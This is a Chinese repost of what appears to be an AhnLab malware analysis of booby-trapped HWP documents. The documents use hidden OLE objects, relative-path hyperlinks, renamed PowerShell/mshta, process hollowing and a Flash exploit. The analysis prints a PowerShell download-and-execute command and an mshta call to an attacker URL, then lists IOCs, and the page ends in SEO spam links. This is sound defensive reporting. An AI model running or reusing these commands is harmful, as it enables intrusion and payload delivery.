当前位置: 首页 > news >正文

做网站的报价万能搜索引擎入口

做网站的报价,万能搜索引擎入口,做网站导航栏目怎么做,北京环球影城寄存柜ASEC 分析人员发现了一个利用 OLE 对象的恶意 HWP 文件,尽管其使用了 2020 年就被识别的恶意 URL,但仍然使用了 Flash 漏洞(CVE-2018-15982),需要用户谨慎对待。 打开 HWP 文件时会在 %TEMP%文件夹中生成如下文件。攻…

ASEC 分析人员发现了一个利用 OLE 对象的恶意 HWP 文件,尽管其使用了 2020 年就被识别的恶意 URL,但仍然使用了 Flash
漏洞(CVE-2018-15982),需要用户谨慎对待。

打开 HWP 文件时会在 %TEMP%文件夹中生成如下文件。攻击者不直接使用 powershell.exe 和 mshta.exe
可能是为了要规避检测。

文件名| 描述—|—hword.exe| 普通的 PowerShell 程序hwp.exe| 普通的 mshta 程序hwp.lnk| 恶意链接文件1234dd.tmp| 恶意 HWP 文件攻击者使用白色矩形图片覆盖插入的 OLE 对象,如下所示:

image.png-100.7kB插入文档的
OLE 对象

image.png-63.4kB文件信息

从文件内容来看,文件中带有个人资料表格等标题。与过去类似,攻击者在每个格中通过空格与超链接来执行恶意文件。

image.png-101.2kB嵌入超链接

image.png-82.3kB超链接详情

当用户单击字段填写表格时,就会执行嵌入的超链接。超链接以相对路径构建,因此 HWP 文件必须处在特定的位置才能触发恶意行为。

通过 mshta.exe 来连接恶意 URL(%tmp%\hwp.exe “hxxp://yukkimmo.sportsontheweb[.]net/hw.php”)。

可以根据攻击者的意图来执行各种恶意命令:

image.png-188.8kB传输的命令

另一个值得一提的恶意命令是:hword.exe -nop -c \”iex(new-object net.webclient).downloadstring('hxxp://yukkimmo.sportsontheweb[.]net/h.txt')

image.png-173.4kB脚本代码

脚本具备两项功能:* 通过 hxxp://yukkimmo.sportsontheweb[.]net/2247529.txt下载其他 PE 文件,保存在 %temp% 文件夹中并通过 Process Hollowing 执行。

image.png-30.5kB进程树* 生成的文件 1234dd.tmp被重命名为 3dd21.tmp。当用户再次打开 HWP 文件时,会自动打开嵌入了 Flash 对象的 HWP 文件(1234dd.tmp),该文件与前述提到的文件也是类似的。

image.png-108.3kB文件信息

后续的 HWP 文件包含一个 Flash 对象,其中嵌入了某个 URL。

image.png-126.2kB嵌入
Flash 对象

image.png-234.2kB对象属性

该 URL(hxxp://www.sjem.co[.]kr/admin/data/category/notice_en/view.php)早在 2020
年就被检测为恶意。

另一个 HWP 文件,伪装成用于支付服务费的个人数据收集表格。其中也嵌入了 OLE 对象,执行的文件基本类似。

image.png-121.9kB识别额外的
HWP 文件

image.png-110.6kB文件信息

表格中依旧嵌入了超链接,用户单击时就会触发 LNK
文件执行命令(hxxp://yukkimmo.sportsontheweb[.]net/hw.php),与前述文章类似。

IOC

76f8ccf8313af617df28e8e1f7f39f73> 9a13173df687549cfce3b36d8a4e20d3> 804d12b116bb40282fbf245db885c093> caa923803152dd9e6b5bf7f6b816ae98> 2f4ed70149da3825be16b6057bf7b8df> 65993d1cb0d1d7ce218fb267ee36f7c1> 330f2f1eb6dc3d753b756a27694ef89b> hxxp://yukkimmo.sportsontheweb.net/hw.php> hxxp://yukkimmo. sportsontheweb[.]net/h.txt> hxxp://yukkimmo.sportsontheweb[.]net/2247529.txt> hxxp://www.sjem.co[.]kr/admin/data/category/notice_en/view.php

参考来源

AhnLab

.php

参考来源

AhnLab

网络安全工程师企业级学习路线

这时候你当然需要一份系统性的学习路线

如图片过大被平台压缩导致看不清的话,可以在文末下载(无偿的),大家也可以一起学习交流一下。

一些我收集的网络安全自学入门书籍

一些我白嫖到的不错的视频教程:

上述资料【扫下方二维码】就可以领取了,无偿分享

http://www.ritt.cn/news/880.html

相关文章:

  • 做网站需要啥备案之类的嘛最近三天的新闻大事摘抄
  • 网站开发设计哪家好免费入驻的卖货平台
  • 网站建设mfdos市场营销经典案例
  • wordpress文章页插件东莞百度seo推广公司
  • 国外优秀企业网站软件网站关键词优化
  • fireworks做网站怎么做好seo推广
  • win7 做网站好吗建网站有哪些步骤
  • 移动商城积分兑换seo排名工具外包
  • WordPress显示403网站优化公司推荐
  • 优质服务的网站设计制作销售推广的方法都有哪些
  • 阿里云网站全部清空怎么做seo经验
  • python自学网厦门百度seo排名
  • 怎么注册公司都需要什么手续济南优化seo公司
  • 电子商务项目策划书重庆seo外包平台
  • 网站建设流程六个步骤自助建站平台
  • 创建网站销售产品网上推广方式
  • 微信小程序可以做电影网站吗网络推广怎么推广
  • 上海企业宣传片制作哪家好搜索引擎的优化方法
  • 签订网站建设合同应注意seo查询系统源码
  • 电子商务网站功能特点编程培训班学费一般多少钱
  • 科技成就成都seo顾问
  • 网站建设的毕业设计选题管理系统聊城网站推广公司
  • 乌鲁木齐北京网站建设服装店营销策划方案
  • 国外网站怎样建设软件外包公司有哪些
  • 简单的网站制作代码长春网站建设定制
  • 通辽市 做网站宁波网站建设
  • 郑州+高端网站建设seo产品是什么意思
  • 江苏有哪些做网站建设的公司谷歌google 官网下载
  • 网站伪静态全站伪静态磁力链最佳的搜索引擎
  • 专注网站开发网站优化推广平台